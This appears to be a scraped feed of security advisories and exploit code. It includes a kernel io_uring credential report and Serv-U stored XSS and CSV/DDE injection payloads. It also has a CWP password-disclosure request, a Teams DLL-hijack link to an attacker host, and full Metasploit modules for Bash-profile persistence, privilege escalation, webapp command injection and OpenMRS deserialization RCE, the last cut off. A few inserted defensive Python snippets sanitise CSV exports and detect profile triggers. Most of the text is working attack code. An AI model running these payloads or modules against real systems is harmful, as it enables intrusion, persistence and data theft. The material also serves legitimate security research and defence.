1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet 1.2.3.4/32 scope global lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$
==========================================================================

The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like "ps aux". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?

While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.

(For people who care about such things: I have requested a CVE identifier from MITRE for this.)


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-19241.



Found by: jannh@google.com


Serv-U FTP Server 15.1.7 Persistent Cross Site Scripting


Serv-U FTP Server version 15.1.7 suffers from a persistent cross site scripting vulnerability.


MD5 | 93f44f4fbef1634cd60607a5bd840c6e

Issue: Stored Cross-Site Scripting

CVE: CVE-2019-13182

Security researcher: Richard Tan @ The Missing Link Security

Product name: Serv-U FTP Server

Product version: Tested on 15.1.7

Fixed in: Serv-U 15.1.7 Hotfix 2



# Overview

The application is vulnerable to stored cross-site scripting. The user's
"Full Name" field and "HTTP Login Title Text" field lacked input validation,
allowing JavaScript code to be inserted and executed in the context of the
user's browser session, either when the victim logs in to the web client or
browses to the Serv-U server login page.

A privileged user could manipulate the affected parameter on an existing
user's account so that JavaScript is executed in the client's browser when
the victim logs into their account.

For example, a successful XSS attack could result in the attacker
redirecting the user to a phishing/malicious site or performing actions as
the victim on the Serv-U application.



**Injection Point in user properties**

* Full Name

* HTTP Login Title Text



# Proof of concept

1) Log in as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the "Fullname"
parameter.
<script>window.location.replace("http://www.example.com");</script>

3) Log in as the victim user and observe the user being redirected to
www.example.com when accessing the web client.
Note that exploiting the "HTTP Login Title Text" field means that the
JavaScript payload is executed when any user browses to the Serv-U
login page.




Serv-U FTP Server 15.1.7 CSV Injection


Serv-U FTP Server version 15.1.7 suffers from a CSV injection vulnerability.


MD5 | 4b705c0bbe42992ddfdc2fadbd731c13

Issue: CSV injection vulnerability

CVE: CVE-2019-13181

Security researcher: Richard Tan @ The Missing Link Security

Product name: Serv-U FTP Server

Product version: Tested on 15.1.7

Fixed in: Serv-U 15.1.7 Hotfix 2





# Overview

The application allowed table entries to contain a string which could be
evaluated by Excel as a Dynamic Data Exchange (DDE) macro.

Privileged users who have the appropriate rights to modify or create users
could insert values into user properties which are evaluated as macros if the
user list is exported in Excel format.



Steps to reproduce (Proof of concept):

1) Log in as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the
"description" field. "=cmd|'/C calc.exe'!A0"

3) Export the user list with a file name "CSVinjection.csv" on the
application server.

4) On the application server, locate the file and execute it. Notice
that a warning may be prompted depending on Excel's security
settings (if so, click Enable).

5) Observe that the calculator tool is executed. This is a proof of
concept; however, an adversary could exploit this weakness to potentially gain
access to the application server (or wherever else the file is executed
from).
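An added example of the export-side fix (not Serv-U code): cells whose first non-space character is one of the spreadsheet formula triggers are prefixed with a single quote, so a description like the one above is stored as text rather than evaluated, and an audit helper flags such cells in an export that already exists. The sample user records and column names are constructed for the example.

```python
# Added example (not Serv-U code): formula-injection-safe CSV export and an
# audit helper for exports that already exist.
import csv
import io
from typing import Iterable, List, Mapping, Tuple

# Excel and LibreOffice treat a cell starting with one of these as a formula
# ('=' and '@' are also how DDE calls such as the advisory's payload begin).
# Leading spaces are ignored conservatively, so " =1+1" is neutralised too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(cell: str) -> bool:
    """True if a spreadsheet could evaluate this cell rather than display it."""
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def sanitize_cell(value: object) -> str:
    """Render one user property as text that will not be evaluated.

    A leading single quote makes the spreadsheet show the cell verbatim; the
    trade-off is that values such as '-5' or '+44 ...' are exported as text."""
    text = "" if value is None else str(value)
    return "'" + text if looks_like_formula(text) else text


def export_users_csv(users: Iterable[Mapping[str, object]], columns: List[str]) -> str:
    """Write the user list as CSV with every cell quoted and sanitised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(columns)
    for user in users:
        writer.writerow(sanitize_cell(user.get(col)) for col in columns)
    return buf.getvalue()


def audit_csv(text: str) -> List[Tuple[int, int, str]]:
    """Return (row, column, value) for every cell of an existing CSV export
    that a spreadsheet would evaluate; an empty list means the file is clean."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if looks_like_formula(cell):
                findings.append((r, c, cell))
    return findings


# Constructed user records; the 'mallory' description is the advisory's payload,
# the other two rows show benign values that still need neutralising.
SAMPLE_USERS = [
    {"login": "alice", "full_name": "Alice Example", "description": "backup operator"},
    {"login": "mallory", "full_name": "M.", "description": "=cmd|'/C calc.exe'!A0"},
    {"login": "trent", "full_name": "+44 20 7946 0000", "description": "@SUM(1,2)"},
]
COLUMNS = ["login", "full_name", "description"]

if __name__ == "__main__":
    exported = export_users_csv(SAMPLE_USERS, COLUMNS)
    print(exported)
    print("findings after sanitising:", audit_csv(exported))
```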




Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure


Control Web Panel versions 0.9.8.856 through 0.9.8.864 suffer from a phpMyAdmin password disclosure vulnerability.


MD5 | 350c05e4dacfce98d3811879f2066056

Exploit Title : CWP (Control Web Panel) phpMyAdmin password access
Date : 20 Aug 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for latest version
Version : 0.9.8.856 - 0.9.8.864
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-14782, CVE-2019-15235
Reference : N/A

1. Log in as a low-privileged user
2. Get the session file name from the path "/tmp" or "/home/[USERNAME]/tmp/session/sess_xxxxxx"
3. Get the token value from "/usr/local/cwpsrv/logs/access_log"
4. Make a request to obtain the target password

GET /cwp_[token]/victim?module=pma HTTP/1.1
Host: 192.168.1.1:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Referer: https://192.168.1.1:2083/
Cookie: PHPSESSID=[sess_xxxxxx]


Microsoft Teams Instant Messenger DLL Hijacking


Microsoft Teams Instant Messenger application on Windows 7 SP1 fully patched is vulnerable to remote DLL hijacking.


MD5 | 9bf58c644aeb9728a0ae475a091ca8b3

Microsoft Teams Instant Messenger application on Windows 7 SP1, fully patched, is vulnerable to remote DLL loading / hijacking because:

a) The OS does not ship with the affected library(ies)
b) The Teams application does not provide the library(ies)

So it performs a search according to the 'PATH' environment variable, including the directory where the application resides and the current working directory, therefore allowing attackers to remotely exploit the issue through the registered URL protocol:

Creating, for example, an Office document containing a hyperlink like "msteams:http://0wnm3.com/x.jpg" is enough to trigger the issue (the user needs to click it, or e.g. OLE objects can be used to automate the action upon document opening). The file should be placed on a WebDAV or SMB share alongside a valid DLL (with a 'DllMain' entry point) named "shcore.dll", "wldp.dll" or "dcomp.dll", among others. Notice that the DLL must match the platform of the Teams app (on Windows x64, Teams x64 is installed by default, so the DLL must be x64 as well).

Tested on Teams v.1.2.00.22654 (latest version) on Windows 7 / 2008 fully patched as of December 2019.


Note: Microsoft was contacted on September 21, 2019.

They replied on the same day with an automated message, saying I would be contacted when the case was reviewed.

Usually in a week or so they reply saying whether they reproduced it or not and/or whether it will be patched or not.


On December 10, 2019, I replied to the thread asking for feedback. No feedback was received until December 15, so I decided to go public.


* Eduardo Braun Prado.

Bash Profile Persistence


This Metasploit module writes an execution trigger to the target's Bash profile. The execution trigger executes a call back payload whenever the target user opens a Bash terminal. A handler is not run automatically, so you must configure an appropriate exploit/multi/handler to receive the callback.


MD5 | 9ac5bc3f15cb2da635c3325eee14b3cc

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bash Profile Persistence',
        'Description' => %q{
          This module writes an execution trigger to the target's Bash profile.
          The execution trigger executes a call back payload whenever the target
          user opens a Bash terminal. A handler is not run automatically, so you
          must configure an appropriate exploit/multi/handler to receive the callback.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Michael Long <bluesentinel[at]protonmail.com>'
          ],
        'DisclosureDate' => 'Jun 8 1989', # First public release of Bourne Again Shell
        'Platform' => ['unix', 'linux'],
        'Arch' => ARCH_CMD,
        'SessionTypes' => ['meterpreter', 'shell'],
        'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
        'Targets' =>
          [
            ['Automatic', {}]
          ],
        'DefaultTarget' => 0,
        'Payload' => {
          'Compat' =>
            {
              'PayloadType' => 'cmd'
            }
        },
        'References' =>
          [
            ['URL', 'https://attack.mitre.org/techniques/T1156/']
          ]
      ))

    register_options(
      [
        OptString.new('BASH_PROFILE', [true, 'Target Bash profile location. Usually ~/.bashrc or ~/.bash_profile.', '~/.bashrc']),
        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp/'])
      ]
    )
  end

  def exploit
    # expand home directory path (i.e. '~/.bashrc' becomes '/home/user/.bashrc')
    # use a non-destructive sub so the datastore value itself is not rewritten
    profile_path = datastore['BASH_PROFILE']
    if profile_path.start_with?('~/')
      home_directory = get_env('$HOME')
      profile_path = profile_path.sub(/^~/, home_directory)
    end

    # check that target Bash profile file exists
    unless exist?(profile_path)
      fail_with Failure::NotFound, profile_path
    end
    print_good("Bash profile exists: #{profile_path}")

    # check that target Bash profile file is writable
    unless writable?(profile_path)
      fail_with Failure::NoAccess, profile_path
    end
    print_good("Bash profile is writable: #{profile_path}")

    # create Bash profile backup on local system before persistence is added
    backup_profile = read_file(profile_path)
    backup_profile_path = create_backup_file(backup_profile)
    print_status("Created backup Bash profile: #{backup_profile_path}")

    # upload persistent payload to target and make executable (chmod 700)
    payload_file = datastore['PAYLOAD_DIR'] + Rex::Text.rand_text_alpha(10..16)
    upload_and_chmodx(payload_file, payload.encoded)

    # write payload trigger to Bash profile
    exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" + "\n" # send stdout and stderr to /dev/null, run in background
    append_file(profile_path, exec_payload_string)
    print_good("Created Bash profile persistence")
    print_status("Payload will be triggered when target opens a Bash terminal")
    print_warning("Don't forget to start your handler:")
    print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
  end

  # create a backup copy of the target's Bash profile on the local system before persistence is added
  def create_backup_file(backup_profile)
    begin
      # meterpreter sessions expose sysinfo; fall back to running hostname on shell sessions
      hostname = session.sys.config.sysinfo["Computer"]
    rescue
      hostname = cmd_exec("hostname")
    end

    timestamp = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")

    log_directory_name = ::File.join(Msf::Config.log_directory, 'persistence/' + hostname + timestamp)

    ::FileUtils.mkdir_p(log_directory_name)

    log_file_name = log_directory_name + "/Bash_Profile.backup"
    file_local_write(log_file_name, backup_profile)
    return log_file_name
  end
end
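As an added defender-side example (not part of the module or this page), the following Python scans a Bash profile for the trigger line shape the module appends (an absolute path run in the background with stdout and stderr sent to /dev/null) and flags it when the path sits in a temp directory or carries an extensionless random-looking name, which is what the module's PAYLOAD_DIR and rand_text_alpha defaults produce. It also shows the diff-against-backup check the module's own backup file makes possible. The sample profile and the temp-directory list are constructed assumptions.

```python
import re

# Shape of the line the module appends: "<payload_file> > /dev/null 2>&1 &"
TRIGGER_RE = re.compile(r"^\s*(?P<path>/\S+)\s*>\s*/dev/null\s+2>&1\s*&\s*$")

# Module default PAYLOAD_DIR plus other world-writable locations
# (assumption: extend this list for your own environment)
TEMP_DIRS = ("/var/tmp/", "/tmp/", "/dev/shm/")

# Module default payload names: 10-16 alphabetic characters, no extension
RANDOM_NAME_RE = re.compile(r"[A-Za-z]{10,16}")


def find_profile_triggers(profile_text):
    """Return (line_number, path, reasons) for each suspicious trigger line.

    A backgrounded command with discarded output is not suspicious by itself;
    it is reported only when the executable's location or name is also odd.
    """
    findings = []
    for lineno, line in enumerate(profile_text.splitlines(), start=1):
        m = TRIGGER_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        reasons = []
        if path.startswith(TEMP_DIRS):
            reasons.append("executable lives in a temp directory")
        if RANDOM_NAME_RE.fullmatch(path.rsplit("/", 1)[-1]):
            reasons.append("random-looking extensionless filename")
        if reasons:
            findings.append((lineno, path, reasons))
    return findings


def diff_against_backup(backup_text, current_text):
    """Non-empty lines present in the current profile but absent from a trusted earlier copy."""
    baseline = set(backup_text.splitlines())
    return [line for line in current_text.splitlines() if line and line not in baseline]


# Constructed sample profile: ordinary content plus one injected trigger line.
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
/var/tmp/kqzpwmhtrlxn > /dev/null 2>&1 &
"""

# Constructed "backup" taken before the trigger was appended (first four lines).
SAMPLE_BACKUP = "\n".join(SAMPLE_BASHRC.splitlines()[:4]) + "\n"

if __name__ == "__main__":
    for lineno, path, reasons in find_profile_triggers(SAMPLE_BASHRC):
        print("line %d: %s (%s)" % (lineno, path, "; ".join(reasons)))
    for added in diff_against_backup(SAMPLE_BACKUP, SAMPLE_BASHRC):
        print("new since backup: %s" % added)
```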

Metasploit Sample Linux Privilege Escalation Exploit


This Metasploit exploit module illustrates how a vulnerability could be exploited in a linux command for privilege escalation.


MD5 | 484a242e6e523fab95eb0bf3936e9709

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sample Linux Priv Esc',
        'Description' => %q(
          This exploit module illustrates how a vulnerability could be exploited
          in a linux command for priv esc.
        ),
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email. Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' =>
          [
            'h00die <mike@stcyrsecurity.com>', # msf module
            'researcher' # original PoC, analysis
          ],
        'Platform' => [ 'linux' ],
        # from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but the exploit
        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        # What types of sessions we can use this module in conjunction with. Most modules use libraries
        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
        # test both to ensure compatibility.
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        # since privilege escalation modules typically result in elevated privileges, this is
        # generally set to true
        'Privileged' => true,
        'References' =>
          [
            [ 'OSVDB', '12345' ],
            [ 'EDB', '12345' ],
            [ 'URL', 'http://www.example.com' ],
            [ 'CVE', '1978-1234' ]
          ],
        'DisclosureDate' => "Nov 29 2019",
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0
      )
    )
    # We typically drop a pre-compiled exploit to disk and run it, however the option
    # is left for the user to gcc it themselves if there is an odd OS or other dependency
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
    ]
    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Simplify pulling the writable directory variable
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Simplify and standardize uploading a file
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
  end

  # Simplify uploading and chmoding a file
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
    register_file_for_cleanup path
  end

  # Simplify uploading and compiling a file
  def upload_and_compile(path, data, gcc_args = '')
    upload "#{path}.c", data

    gcc_cmd = "gcc -o #{path} #{path}.c"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end

    # only append extra gcc arguments when the caller supplied some
    unless gcc_args.to_s.blank?
      gcc_cmd << " #{gcc_args}"
    end

    output = cmd_exec gcc_cmd

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
    chmod path
  end

  # Pull the exploit binary or file (.c typically) from our system
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'DOES_NOT_EXIST', file)
  end

  # If we're going to live compile on the system, check gcc is installed
  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end

    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end

    # COMPILE is Auto and gcc is missing: fall back to the pre-compiled binary
    false
  end

  def check
    # Check the kernel version to see if its in a vulnerable range
    release = kernel_release
    if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
       Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
      vprint_error "Kernel version #{release} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Kernel version #{release} appears to be vulnerable"

    # Check the app is installed and the version, debian based example
    package = cmd_exec('dpkg -l example | grep \'^ii\'')
    if package && package.include?('1:2015.3.14AR.1-1build1')
      print_good("Vulnerable app version #{package} detected")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  #
  # The exploit method drops a payload file to the system, then either compiles and runs
  # or just runs the exploit on the system.
  #
  def exploit
    # First check the system is vulnerable, or the user wants to run regardless
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    # Check if we're already root
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    # Make sure we can write our exploit and payload to the remote system
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
    executable_name = ".#{rand_text_alphanumeric(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
      rm_f "#{executable_path}.c"
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx executable_path, exploit_data('example')
    end

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit with a timeout. We also have a vprint_status so if the user wants all the
    # output from the exploit being run, they can optionally see it
    timeout = 30
    print_status "Launching exploit..."
    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end

Metasploit Sample Webapp Exploit


This Metasploit exploit module illustrates how a vulnerability could be exploited in a webapp.


MD5 | 15880c1bae79cabfa0bc303baa8a9153

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary web server
#
###
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This exploit affects a webapp, so we need to import HTTP Client
  # to easily interact with it.
  #
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        # The Name should be just like the line of a Git commit - software name,
        # vuln type, class. Preferably apply
        # some search optimization so people can actually find the module.
        # We encourage consistency between module name and file name.
        'Name' => 'Sample Webapp Exploit',
        'Description' => %q(
          This exploit module illustrates how a vulnerability could be exploited
          in a webapp.
        ),
        'License' => MSF_LICENSE,
        # The place to add your name/handle and email. Twitter and other contact info isn't handled here.
        # Add reference to additional authors, like those creating original proof of concepts or
        # reference materials.
        # It is also common to comment in who did what (PoC vs metasploit module, etc)
        'Author' =>
          [
            'h00die <mike@stcyrsecurity.com>', # msf module
            'researcher' # original PoC, analysis
          ],
        'References' =>
          [
            [ 'OSVDB', '12345' ],
            [ 'EDB', '12345' ],
            [ 'URL', 'http://www.example.com' ],
            [ 'CVE', '1978-1234' ]
          ],
        # platform refers to the type of platform. For webapps, this is typically the language of the webapp.
        # js, php, python, nodejs are common, this will affect what payloads can be matched for the exploit.
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Platform' => ['python'],
        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
        'Privileged' => false,
        # from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but for webapps typically
        # this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
        # A full list is available in lib/msf/core/payload/uuid.rb
        'Arch' => ARCH_PYTHON,
        'Targets' =>
          [
            [ 'Automatic Target', {} ]
          ],
        'DisclosureDate' => "Apr 1 2013",
        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
        # It's generally easiest just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0
      )
    )
    # set the default port, and a URI that a user can set if the app isn't installed to the root
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin' ]),
        OptString.new('PASSWORD', [ false, 'Password to login with', '123456' ]),
        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/' ])
      ], self.class
    )
  end

  #
  # The sample exploit checks the index page to verify the version number is exploitable
  # we use a regex for the version number
  #
  def check
    # we want to handle cases where the port/target isn't open/listening gracefully
    begin
      # only catch the response if we're going to use it, in this case we do for the version
      # detection.
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'GET'
      )
      # gracefully handle if res comes back as nil, since we're not guaranteed a response
      # also handle if we get an unexpected HTTP response code (anything other than 200)
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200

      # here we're looking through html for the version string, similar to:
      # Version 1.2
      /Version: (?<version>[\d]{1,2}\.[\d]{1,2})<\/td>/ =~ res.body

      if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
        vprint_good("Version Detected: #{version}")
        return Exploit::CheckCode::Appears
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
    Exploit::CheckCode::Safe
  end

  #
  # The exploit method attempts a login, then attempts to throw a command execution
  # at a web page through a POST variable
  #
  def exploit
    begin
      # attempt a login. In this case we show basic auth, and a POST to a fake username/password
      # simply to show how both are done
      vprint_status('Attempting login')
      # since we will check res to see if auth was a success, make sure to capture the return
      res = send_request_cgi(
        'uri' => '/login.html',
        'method' => 'POST',
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
        'vars_post' => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      )

      # a valid login will give us a 301 redirect to /home.html so check that.
      # ALWAYS assume res could be nil and check it first!!!!!
      unless res && res.code == 301
        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res ? res.code : 'no response'})")
      end

      # grab our valid cookie
      cookie = res.get_cookies
      # we don't care what the response is, so don't bother saving it from send_request_cgi
      vprint_status('Attempting exploit')
      send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'command.html'),
        'method' => 'POST',
        'cookie' => cookie,
        'vars_post' =>
          {
            'cmd_str' => payload.encoded
          }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end

OpenMRS Java Deserialization Remote Code Execution


OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the webservices.rest module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as /ws/rest/v1/concept. This Metasploit module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform v2.1.2 and v2.21 with Java 8 and Java 9.


MD5 | c97ba40f300b81ba6c0c682076d3217c

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OpenMRS Java Deserialization RCE',
      'Description' => %q(
        OpenMRS is an open-source platform that supplies
        users with a customizable medical record system.

        There exists an object deserialization vulnerability
        in the `webservices.rest` module used in OpenMRS Platform.
        Unauthenticated remote code execution can be achieved
        by sending a malicious XML payload to a Rest API endpoint
        such as `/ws/rest/v1/concept`.

        This module uses an XML payload generated with Marshalsec
        that targets the ImageIO component of the XStream library.

        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
        8 and Java 9.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Nicolas Serra', # Vuln Discovery and PoC
          'mpgn', # PoC
          'Shelby Pace' # Metasploit Module
        ],
      'References' =>
        [
          [ 'CVE', '2018-19276' ],
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
          [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
      'Platform' => [ 'unix', 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Targets' =>
        [
          [ 'Linux',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Platform' => [ 'unix', 'linux' ],
              'CmdStagerFlavor' => 'printf'
            }
          ]
        ],
      'DisclosureDate' => '2019-02-04',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
      ])

    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
  end

  def check
    # send_request_cgi! follows redirects so we land on the actual login/index page
    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
    return CheckCode::Unknown("OpenMRS page unreachable.") unless res

    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
    response = res.get_html_document
    version = response.at('body//h3')
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text

    version_no = version.text
    version_no = version_no.match(/\d+\.\d+\.\d*/)
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no

    version_no = Gem::Version.new(version_no)

    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
    end

    CheckCode::Safe
  end

  def format_payload
    payload_data = payload.encoded.to_s.encode(xml: :text)
    payload_arr = payload_data.split('', 3)
    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
  end

  # payload_cmd is consumed by the ERB template through the binding passed below
  def read_payload_data(payload_cmd)
    # payload generated with Marshalsec
    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
    payload_data = File.binread(erb_path)
    payload_data = ERB.new(payload_data).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
  end

  def execute_command(cmd, opts = {})
    cmd = cmd.encode(xml: :text)
    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
    payload_data = read_payload_data(xml_data)

    send_request_cgi(
      'method' => 'POST',
      'uri' => rest_uri,
      'headers' => { 'Content-Type' => 'text/xml' },
      'data' => payload_data
    )
  end
